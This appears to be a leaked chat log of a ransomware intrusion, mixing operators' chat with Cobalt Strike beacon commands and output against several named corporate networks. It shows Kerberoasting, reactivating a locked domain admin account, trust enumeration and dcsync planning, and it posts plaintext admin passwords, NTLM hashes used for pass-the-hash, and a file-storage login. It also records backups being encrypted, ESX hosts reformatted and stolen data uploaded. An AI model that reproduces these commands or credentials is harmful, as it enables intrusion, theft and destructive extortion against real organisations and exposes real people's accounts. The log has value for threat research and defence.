WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/asnet2000.standards.com.au:1433' from user 'CN=geronimo,OU=Users Pre-MOE,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05677XPD.standards.com.au:1433' from user 'CN=Sam Allen,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05591XPN.standards.com.au:1433' from user 'CN=Raymond Yuen,OU=Users-Disabled,OU=Users,OU=SAI-Global - objects NOT to be migrated,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05556WD.standards.com.au:1433' from user 'CN=Aaron Flew,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/SYDIIS.standards.com.au:1700' from user 'CN=SSQLrvService,OU=Service Accounts,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
What's wrong? Check the file?
[*] Tasked beacon to psinject: invoke-kerberoast -domain datacenter.local -outputformat hashcat | fl | out-file -filepath c:\ProgramData\datacenterlocalhash.txt -append -force -encoding UTF8 into 840 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/C360SQL3:56162' from user 'CN=usatlhc-sql,CN=Users,DC=datacenter,DC=local' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
a, not in hashcat format))))))) I'm going to redo it now try to remove the kerb from the trust without a token, net user, have you taken the kerbs off and done nothing yet? if he had been blocked in front of him, most likely in 3 hours you would have lost all sessions already
Lockout threshold: 10
He's not the last administrator, by the way.
Local Group Memberships *Backup Operators *Epicor Admins
Global Group memberships *Exchange Admins *SAIG Corporate IT Dat *SG-Global-FTP-Adminis*APAC Websense Web Sec *SG-EMEA-Citrix-Admin *APAC SAN Admin *SL-SAIG-EU CS vCenter*SG-AS-Citrix-AdminApp *SG-Americas-Storage-A*ucsadmin *APAC Citrix Admin Acc*SG-Global-TEN-Admin *SG-Okta-MFA Yubikey *SAIG Corporate IT SCC *SG-Global-Actifio-Adm*SG-Global-Azure-SAIGL *SG-APAC-Citrix-Admin *SG-Okta-Salesforce-Co *APAC MOM Authors *APAC Storage Admins *APAC Actifio Admins *SG-APAC-Horizon-RDP *SG-Okta-MFA SMS *SG-Okta-Admin Super A *SG-Global-FPS-Adminis* SG-Okta-Salesforce-SL *SAIG Corporate IT Tre*SAIG Corporate IT SCC *Desktop Admins *Group Policy Creator *SAIG SMS Administrato*VCO_Admins *SG-Okta-Fortinet *SG-GLOBAL-EMS-ADMIN *SG-AMER-SAN-PureAdmin*SG-Okta-MFA Okta Veri *Domain Admins *APAC vCenter Admin *SAIG SMS Users *SG-GLOBAL-vCenter Adm. *Domain Users *SG-Okta-SandboxAccess *SG-GLOBAL-Horizon-Adm*SG-AMER-HorizonPOC1-U *APAC SAN Users *SG-Americas-Citrix-Ad *Exchange Full Admins *SAIG SMS RemoteResolv *sg-aws-adfs-opsprod-c*SG-APAC-Citrix-RDP *Americas Actifio Admi*SG-Citrix-TerminalSVC *SG-Global-OKTA-Users *Firewall Admins *SG-Corp-IT-Americas *SG-Okta-Jamf Pro *SQL Admins *SPS Administrators *SG-AMER-VCENTER-Admin *SG-IT-Americas
How many attempts do you need to see the password block policy?
beacon> shell net user adm.kinzac0 /domain /active:yes
[*] Tasked beacon to run: net user adm.kinzac0 /domain /active:yes
[+] host called home, sent: 71 bytes
[+] received output:
The command completed successfully.
beacon> shell net user adm.kinzac0 /dom
[*] Tasked beacon to run: net user adm.kinzac0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name adm.kinzac0
Full Name Admin - Zach King
Comment Zach King Administrator Account
User's comment
Country/region code (null)
Account active Yes
Account expires Never
Hasn't his password been changed?
If it was taken in the 20s
adm.fraste1
Password last set 23/09/2020 12:59:10 PM
Password expires 7/12/2020 12:59:10 PM
Password changeable 24/09/2020 12:59:10 PM
CATOR-SQLSA Americadpm sqladmin checking DA for validity did you do? not just usually a sample of 3 You have more passwords are you on dcsync? if we do not have a new password dcsync? yes user loginname /DOMAIN /active:YES ? when it hits the joint 1 day before expires and postlet to info may not be relevant literally the next day of course it's better to check accesses you have such a possibility and preferably quickly eras block his token with invalid password and blocked him) info was taken in 20 days he had his password changed on the 27th
Password last set 27/09/2020 4:07:48 AM
Password expires 11/12/2020 4:07:48 AM
Password changeable 28/09/2020 4:07:48 AM
So maybe the rest of the DA should be checked? and who was blocked? what were the last 5 commands? no, so we didn't even have time to do anything( lying? :face_with_monocle: that was it(( already blocked?
The referenced account is currently locked out and may not be logged on to.
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:44:38> shell ping c360.local -n 1
[*] Tasked beacon to run: ping c360.local -n 1
[+] host called home, sent: 51 bytes
[+] received output:
Pinging c360.local [10.195.43.2] with 32 bytes of data:
Reply from 10.195.43.2: bytes=32 time<1ms TTL=127
Ping statistics for 10.195.43.2:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:43:18> shell ping SaigProd.local -n 1
[*] Tasked beacon to run: ping SaigProd.local -n 1
[+] host called home, sent: 55 bytes
[+] received output:
Pinging SaigProd.local [10.195.100.1] with 32 bytes of data:
Reply from 10.195.100.1: bytes=32 time<1ms TTL=127
Ping statistics for 10.195.100.1:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
please send me the current server dns and quarantines quarantined so portscan to 445 port at this address, all trusts were pinged, even 2 quarantined ones or replica on ping is disabled when you get this result, most probably from your entry point where you are in session now, traffic is not allowed. Most probably WSUS server needs to look for servers with quarantined domain in DNS so no ping, I think it is understandable here.
Ping request could not find host Anstat.local. Please check the name and try again.
it is like he does not see it because the domain is quarantined and DNS within this domain is not available to our domain @user3 and all others
```
dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2007/07/02-22:18:37 Eastern Daylight Time
>name: Anstat.local
>securityIdentifier: S-1-5-21-295181386-3567791559-1353306441
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: Anstat.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
```
beacon> run ping ad-apse2.prd.aws.saig
[*] Tasked beacon to run: ping ad-apse2.prd.aws.saig
[+] host called home, sent: 44 bytes
[+] received output:
Pinging ad-apse2.prd.aws.saig [10.10.149.148] with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
Request timed out.
Ping statistics for 10.10.149.148:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
3/4 100% loss.
Pinging ad-apse2.np.aws.saig [10.10.4.166] with 32 bytes of data:
Request timed out.
Ping statistics for 10.10.4.166:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
beacon> run ping Anstat.local
[*] Tasked beacon to run: ping Anstat.local
[+] host called home, sent: 35 bytes
[+] received output:
Ping request could not find host Anstat.local. Please check the name and try again.
If it's not pinging, do you go further down the list?
And another thing, since the report will be an archive, next to the ad_*.txt file, make a file creds.txt where DCs DA EA LA and if you run the command 5 times net use in another domain without reading the error as you like, then you can say that about 50% of the admins that something will suspect) and more, DA creds in the other domains can block your account as you understand the beginning ping all domains and see if they respond quarantined more difficult because you can not get out of there any information, you can check the availability of DNS from a quarantined domain but in this case, dcsync THROUGH trust will be very noisy In such a relationship, you can use trust to pull kerbs, pull the AD, in my @user8 dcsync by trust, just saw @user7 take two quarantined domains))) with quarantined domains is more complicated)
```
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
```
```
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
```
trustDirection trustAttributes Did you read what to look for? trusts can't have all pdc's, right?
```
trusts:
datacenter.local
ad-apse2.build.aws.saig
ad-usea1.prd.aws.saig
c360uk.local
```
```
EA: saig.frd.global\CATOR-SQLSA T3rm1nal
```
anyone read the trusts file?
dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global ``` my `saig.frd.global\tresvc0 3nterprisE```` saig.frd.global\adm.kinzac0 dr3Amth3At3r ``` ``` dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global dn:CN=saig.frd.global,CN=System,DC=frd,DC=global dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global `````` saig.frd.global\tresvc0 3nterprisE >name: datacenter.local >name: legalco.local >name: anstat.local >name: ad-apse2.prd.aws.saig ``So if we find these, they are written in a separate groupwhy I wrote about the allocation of backup servers, you should relate to the scan, it often happens that the backup server is outside the domain, they are somewhere in the workgroup nearby and as you have understood, the report will be the archive in which 1) YES, hell info, EA, LA on MAC, hashes of all users 2) Sort all PCs in the domain 3) Which EDR and where it is administered (admin with valid accesses) 4) In each trust session (or specifying the links from where to where and how to get in) 6) Separate group of backup servers, separate user's PCs Repeat items above for each domain to 3 hours can handle it (260 machines per brotam will report if manuals, then by hand) 1300 servers in one domain this time I think right away by hand, on Saturday almost an hour with the script struggled, in the end pinged for 5 minutes, what did loomisco disassemble the network What is the task? again pinged decided yes? 
hopefully this time faster) ad_comp > win serv > ping > portscan /24 ?``` IDJAK-COPFP01.saig.frd.global [DS] Site: IDKBU1 UKMK1-COPADS01.saig.frd.global [DS] Site: UKMIK1 USALP1-COPADS01.saig.frd.global [DS] Site: USALP1 USWAL1-COPADS01.saig.frd.global [DS] Site: USWAT1 CNPEKJV-DC1.saig.frd.global [DS] Site: CNCHD1 AUMEL1-COPADS02.saig.frd.global [DS] Site: AUMEL1 THPAT1-COPADS02.saig.frd.global [DS] Site: THPAT1 AUBNE1-COPADS01.saig.frd.global [DS] Site: AUBNE1 AUOSB1-COPADS01.saig.frd.global [DS] Site: AUOSB1 AUPME1-COPADS02.saig.frd.global [DS] Site: AUPME1 JPTOK1-COPADS01.saig.frd.global [DS] Site: JPTOK1 UKHDC1-COPADS01.saig.frd.global [DS] Site: UKHDC1 UKHDC1-COPADS02.saig.frd.global [DS] Site: UKHDC1 CATOR1-COPADS01.saig.frd.global [DS] Site: CATOR1 auhdc1-copads01.saig.frd.global [PDC] [DS] Site: AUHDC1 AUSYD1-COPADS01.saig.frd.global [DS] Site: AUSYD1 USHDC1-COPADS03.saig.frd.global [DS] Site: USHDC1 USHDC1-COPADS02.saig.frd.global [DS] Site: USHDC1 AUHDC2-COPADS02.saig.frd.global [DS] Site: AUHDC2 AUHDC2-COPADS01.saig.frd.global [DS] Site: AUHDC2 AUHDC1-COPADS03.saig.frd.global [DS] Site: AUHDC1 AUSYD1-COPADS02.saig.frd.global [DS] Site: AUSYD1 AUHDC1-COPADS02.saig.frd.global [DS] Site: AUHDC1 AUHDC1-COPADS04.saig.frd.global [DS] Site: AUHDC1 NLDEN1-COPADS01.saig.frd.global [DS] Site: NLDEN1 AUHDC1-COPADS05.saig.frd.global [DS] Site: AUHDC1 AUADE1-COPADS03.saig.frd.global [DS] Site: AUADE1 KRSEO1-COPADS01.saig.frd.global [DS] Site: KRSEO1 IDJAK-COPADS01.saig.frd.global [DS] Site: IDKBU1 auspt1-copads02.saig.frd.global [DS] Site: AUSPT1 EUCEN1COPADS01.saig.frd.global [DS] Site: EUCEN1 EUCEN1COPADS02.saig.frd.global [DS] Site: EUCEN1 EUCEN1COPADS03.saig.frd.global [DS] Site: EUCEN1 usnachc-rbs01.saig.frd.global [RODC] ittur1-cop-rbs1.saig.frd.global [RODC] esmad1-cop-rbs1.saig.frd.global [RODC] aubne1-rbs01.saig.frd.global [RODC] auhdc2-rbs01.saig.frd.global [RODC] thpat1-rbs01.saig.frd.global [RODC] idjak1-rbs01.saig.frd.global [RODC] 
cnzhd1-rbs01.saig.frd.global [RODC] jptok1-rbs01.saig.frd.global [RODC] krseo1-rbs01.saig.frd.global [RODC] cnchd1-rbs01.saig.frd.global [RODC] auspt1-rbs01.saig.frd.global [RODC] aumel1-rbs01.saig.frd.global [RODC] ausyd1-rbs01.saig.frd.global [RODC] aucbr1-rbs01.saig.frd.global [RODC] auhob1-rbs1.saig.frd.global [RODC] auhob1-rbs01.saig.frd.global [RODC] auhdc1-rbs01.saig.frd.global [RODC] auper1-rbs01.saig.frd.global [RODC] auade1-rbs01.saig.frd.global [RODC] auwme1-rbs01.saig.frd.global [RODC] ================================================ adm.barsmr0 adm.bisfra0 adm.bremic0 adm.brodan0 adm.brodav1 adm.caupau0 adm.damben0 adm.davjon0 adm.evamar1 adm.fraste1 adm.hauant0 adm.kalnic0 adm.kemrob0 adm.kinzac0 adm.kinzac1 adm.lowrhy0 adm.macpet0 adm.matdmy0 adm.phykev0 adm.rutluq0 adm.soucam1 adm.staric0 adm.taydav1 adm.tedmar0 adm.turime0 adm.wu0dav0 adm.yorgar0 Admin.AVservers admin.DTservice admin.LMS Admin.MOMaction admin.websense1 Admin.White admnav0 Americadpm AUSYDHC-WINCL02$ backup-exec balpro0 cadmin0 dpservice eis_netapp EMEA.SCCM.Admin EMEA.SCCM.Client fsae.service inssvc0 offser0 ops.ji0lei0 ops.kasbri0 ptbackup RBservice rdpservices serqmi0 sqladmin svc.amwebsense svc.cloudlink svc.dpmadmin svc.foldersync svc.lansweeper svc.msmap svc.ncentral svc.netrix svc.OMAdmin svc.sccmcliinst svc.sharegate svc.sharegate2 svc.sharegate3 svc.sharegate4 svc.sharegate5 svc.sharepoint svc.vcauth svc_actifio svc_scanner_chicago SVC_Tenablescan svc_trendmicro svc-amer-ems-search svc-apac-ems-search SVC-CloudEndure svc-emea-ems-search SVC-Global-AD-LDAP SVC-Global-Azure-ADC svc-global-okta-ad SVC-SCCMadmin sv-emea-adm-actifio tasks tresvc0 ukmik-dbsa UKvc4admin vcatladmin0 verisign verisignus walbexec WebAppAdminProd saig.frd.global\adm.fraste1 Access04 saig.frd.global\sqladmin u5t3r saig.frd.global\Americadpm B0b@f3tt saig.frd.global\CATOR-SQLSA T3rm1nal saig.frd.global\tresvc0 3nterprisE saig.frd.global\adm.kinzac0 dr3Amth3At3r ``saiglobal.com Just do not dump again 
have a good weekend thank you all caught up I have what is on Mon by 2 I need a session then and that's it1.done.rtpcompany.com> the wheel to spin a little > I don't understand how you didn't understand that I need a session out of the water if I write you about it in that confu I never understood what session@user8 I never waited for a session from you server: US.ALLOYPOLYMERS.COM hell: 47 alive: 10 closed 10 WINONA.RTPCO.LOCAL by hell: 52 alive:45 closed 45 RTPCO.LOCAL by hell: 106 alive: 90 closed:90 ARMS: RTPCO.LOCAL By hell: 1,076 Alive: 217 WINONA.RTPCO.LOCAL By hell: 65 Alive: 12 US.ALLOYPOLYMERS.COM By hell: 501 Alive: 24 domain vide unshared disks and killed important processes ices have been wiped out ``Turn the wheel a little if yes, I'm waiting for the statistics and winding down the servers, the center and everything else? [+] host called home, sent: 38 bytes beacon> ls E:\Backups\Henderson [*] Tasked beacon to list files in E:\Backups\Henderson [+] host called home, sent: 38 bytes [*] Listing: E:\Backups\Henderson\ Size Type Last Modified Name ---- ---- ------------- ---- 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN 1gb fil 01/15/2021 22:26:36 
HendersonD2020-12-22T220028_76F2.vib.RQGNN 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN 64gb fil 01/15/2021 23:38:37 HendersonD2020-12-31T180035_06A1.vib.RQGNN 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN 1gb fil 01/15/2021 23:21:48 HendersonD2021-01-10T180033_2241.vib.RQGNN 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN 930b fil 01/15/2021 22:14:24 readme.txt ``All the process1 file? 
beacon> ls E:\Backups\Henderson [*] Tasked beacon to list files in E:\Backups\Henderson [+] host called home, sent: 38 bytes [*] Listing: E:\Backups\Henderson\ Size Type Last Modified Name ---- ---- ------------- ---- 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN 1gb fil 01/15/2021 22:26:36 HendersonD2020-12-22T220028_76F2.vib.RQGNN 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN 64gb fil 01/15/2021 23:01:49 HendersonD2020-12-31T180035_06A1.vib 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN 1gb fil 01/15/2021 23:21:48 
HendersonD2021-01-10T180033_2241.vib.RQGNN 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN 930b fil 01/15/2021 22:14:24 readme.txt ``How much is ready?:meat_on_bone:well without the marble beef it's hard to wait chet (if you're going to order then orderwaitWe need to allocate budget for the second food order it's another hour and a half at least(wait for finals with backups even less than half is still alive:man_shrugging:prolly dead)skully and tdservers what cut off?session is alive backups are still encrypted (apparently takotrubili? beacon> shell ping -n 1 10.89.11.40 [*] Tasked beacon to run: ping -n 1 10.89.11.40 [+] host called home, sent: 52 bytes [+] received output: Pinging 10.89.11.40 with 32 bytes of data: Request timed out. Ping statistics for 10.89.11.40: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), How's the progress on the backups? 20 more minutes, the guys said they ran through the servers - everything is OK, encrypted.) ``` E:Backups -size 15 There ``may be lags for the following reason - it's a virtualulka, it gets encrypted in several threads, and on the disk, where this virtualulka lies, the space freed from backups gets filled with crap at the same time. That's the disk io and does not take out. But it's not sure)) let me try again from the neighboring process with the flag? no, it's 181gb stalled... the rest are still intact... one that's less than a megabyte encrypted how many files? it will encrypt them until monday... let it encrypt them not. 
Directory of E:\ 01/15/2021 09:24 PM Backups 01/15/2021 09:24 PM ProgramData 01/15/2021 09:24 PM 930 readme.txt 01/15/2021 09:24 PM Test 1 File(s) 930 bytes 3 Dir(s) 1,824,136,421,376 bytes free Last time, in the same domain, the backups were monitored for a few more days and there is a script that will quickly fill it all up. what is the disk size? delete and fill it up with crap. let's try to delete it, but it won't be faster. the process is running, but one file changed?where's the progress? would it be faster to delete them? what are we doing now? all the other backups in the ex are in progress? backups are in progress, another 10-15% have reformatted esx and snaps? backups are encrypted? domain vide unshared disks and killed important processes? servers: US.ALLOYPOLYMERS.COM by hell: 47 alive: 10 closed 10 WINONA.RTPCO.LOCAL by hell: 52 alive:45 closed 45 RTPCO.LOCAL by hell: 106 alive: 90 shut down: 90 `````` ARMS: RTPCO.LOCAL By hell: 1,076 Alive: 217 WINONA.RTPCO.LOCAL By hell: 65 Alive: 12 US.ALLOYPOLYMERS.COM By hell: 501 Alive: 24 All disks were unshared everywhere, important processes were killed `````` WINONA.RTPCO.LOCAL On one server (WEB4) 16 IPs, 14 pulled in :D by hell: 52 attracted: 45 with live ones, in the list of pinged they are 70, minus 15 ips that are held on 1 hostname = 55 WEB4.winona.rtpco.local [89.0.0.158] - pulled up on different IP WEB4.winona.rtpco.local [89.0.0.152] - pulled up on another IP ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445 ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445 ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445 ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445 ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445 ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445 ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 ``rtpco. 90/90 4 zamapilnu get takmap? 
ni piepni psekni vmikne fly `` US.ALLOYPOLYMERS.COM by hell: 47 alive: 10 Attracted: 6 not attracted: 4, covered AlloyAMMS.us.alloypolymers.com: 10.1.1.231 alloylicweb.us.alloypolymers.com: 10.1.1.238 alloyxenapp.us.alloypolymers.com: 10.1.1.237 alloyapp3.us.alloypolymers.com: 10.1.1.250 ``They're at 445 check psek and other past? ``` 10.89.11.120 - 10.56.0.30 - 10.89.11.26 - 10.56.0.31 - in the list of servers such kutera at all I'm in the log of the pulled in ipi from other domains as resovlit? it's ping - and the issuance of that external-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445 ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445 ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445 ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445 ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445 ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445 ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 more than 100% as they say in the peoplevot because of this turns out in the list of servers are 52, and in the list of live - 70 ``. 
WEB4.winona.rtpco.local: 89.0.0.66 WEB4.winona.rtpco.local: 89.0.0.160 WEB4.winona.rtpco.local: 89.0.0.159 WEB4.winona.rtpco.local: 89.0.0.158 WEB4.winona.rtpco.local: 89.0.0.157 WEB4.winona.rtpco.local: 89.0.0.156 WEB4.winona.rtpco.local: 89.0.0.155 WEB4.winona.rtpco.local: 89.0.0.154 WEB4.winona.rtpco.local: 89.0.0.153 WEB4.winona.rtpco.local: 89.0.0.152 WEB4.winona.rtpco.local: 65.162.42.250 WEB4.winona.rtpco.local: 65.162.42.242 WEB4.winona.rtpco.local: 65.162.42.197 WEB4.winona.rtpco.local: 65.162.42.254 WEB4.winona.rtpco.local: 65.162.42.252 WEB4.winona.rtpco.local: 65.162.42.251 `````` ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445 ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445 ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445 ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445 ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445 ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445 ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 ````10.89.11.33 10.56.0.30 10.89.11.31 10.5.0.4 10.89.11.39 10.17.1.6 10.89.11.26 10.28.0.5 10.5.0.5 10.58.0.31 89.0.0.81 10.58.0.35 10.89.12.29 10.7.0.25 10.89.11.10 10.58.0.30 10.89.11.22 10.89.11.24 10.5.0.19 10.1.10.10 10.89.11.13 10.7.0.40 10.56.0.31 10.57.0.25 10.89.11.120 10.89.10.12 ``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=kyyNPrj7yHJvyTG5K) `` make_token ALLOY\Administrator j@mez9olk ``` ``` pth WINONA\dch 876c802a60e4623dae480bf75d215bbc ``` ``` pth RTPCO\Administrator 468b54c4c90c3f6e96486d9f0227540b `````` 185.150.189.165:21328 oRBZ6uRQQXg3EYp855awPPRBVQ8V7MooXcUR ``yeah. 
and also on top, if linux allowed you to zero kill?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=khC6izSwxJ7zK2oCT) why, there will be nothing left?the bild throw activeladno on nixes then unpack the folder i hope that i already deleted everything from there i also deleted in mega there is a treshell) i did not delete that) fucklists and separate files that were taken out not pour in mega pure files from network deleted this archive in mega[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=fH2KsEoTv697XoKSy) listings, now i will add the listings? i do not have more there archive with backups of boring luqdztoszgtqucubfv@upived.online asdergIJW3RETmjite453 ``Give access to the accounts from megitut data collected? Good night) good night tomorrow by 3session in slip files deleted ok for today everything.yesTomorrow work? check your ballymore fell off or not. my offs worked for an hour)) #1-done-rtpcompany-com has a system so you can change the status of the result ok just access to rps apparently)and he is not LA and the first - current last time there was no funny thing, just ran SharpShares` `` [+] received output: Shares for 27L28: [--- Unreadable Shares ---] HP LaserJet Pro 